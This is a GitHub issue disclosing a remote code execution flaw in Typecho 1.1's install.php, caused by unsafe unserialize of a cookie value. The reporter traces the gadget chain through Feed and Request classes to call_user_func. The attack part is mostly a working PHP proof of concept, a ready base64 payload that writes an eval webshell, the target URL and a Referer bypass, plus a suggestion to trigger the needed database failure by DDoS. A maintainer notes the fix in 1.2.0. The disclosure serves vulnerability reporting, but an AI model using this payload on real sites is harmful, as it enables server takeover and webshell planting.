Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability #1523

Closed
youyou-pm10 opened this issue Jan 12, 2023 · 2 comments
Closed

the typecho1.1/17.10.30 has a Remote Code Execute Vulnerability #1523

youyou-pm10 opened this issue Jan 12, 2023 · 2 comments

Comments

@youyou-pm10
Copy link

List of Vulnerable path

Vulnerable path /install.php
Lines 60-69 of the "install.php" catch the error but do nothing,so bypass the line 65's "exit".
code.png
It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.
We can simulate this situation by breakpoint debugging.Set the breakpoint on the line 60,then cut off the connection with the database.(such as phpstorm + phpstudy and so on)
net.png
debug.png
Lines 74-87 of the "install.php",we can fake the reffer bypass the second "exit".we can set the reffer "http://localhost/".
reffer.png
Line 291 of the "install.php" has a function "unserialize",it can be exploited maliciously.
The parameters come from line 83 of the "/var/Typecho/Cookie.php".
unserialize0.png
Line 420 of the "install.php" triggeres function "__toString".
Line 223 of the "/var/Typecho/Feed.php" has function "__toString"
toString1.png
toString2.png
toString3.png
Line 290 of the "/var/Typecho/Feed.php" triggeres function "__get".
Line 270 of the "/var/Typecho/Request.php" has function "__get"
get1.png
get2.png
get3.png
We can exploit function "call_user_func" to Remote Code Execute.

Vulnerability exploitation process:

It occurs when the network is unstable,we can create the situation by DDOS to a database exposured to the public network or just wait for it.Of course,we can send network packets repeatedly to wait for it.
ok.png
The "ok" will be sent if it is success because of the POC.Then test the webshell.
info.png

POC code:

<?php
class Typecho_Request{
    private $_params= array('screenName'=> 'php -r "echo \'ok\';file_put_contents(\'cmd.php\', \'<?php eval($_POST[\"youyou\"]); ?>\');"');
    private $_filter= array('system');
}
class Typecho_Feed{
    private $_items=array();
    private $_type='ATOM 1.0';
    public function __construct()
    {
        $items['author']=new Typecho_Request();
        $this->_items[0]=$items;
    }
}
$config['prefix'] = new Typecho_Feed();;
$payload = base64_encode(serialize($config));
echo $payload;
URL: http://localhost/install.php?start=1
POST Data: delete=true&__typecho_config=YToxOntzOjY6InByZWZpeCI7TzoxMjoiVHlwZWNob19GZWVkIjoyOntzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YToxOntzOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo4NjoicGhwIC1yICJlY2hvICdvayc7ZmlsZV9wdXRfY29udGVudHMoJ2NtZC5waHAnLCAnPD9waHAgZXZhbCgkX1BPU1RbXCJ5b3V5b3VcIl0pOyA/PicpOyIiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6Njoic3lzdGVtIjt9fX19czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7fX0=
Reffer: http://localhost/
@myaijarvis
Copy link

very good!

@joyqi
Copy link
Member

joyqi commented Jan 12, 2023

We have fixed this issue in 1.2.0.

@joyqi joyqi closed this as completed Jan 13, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants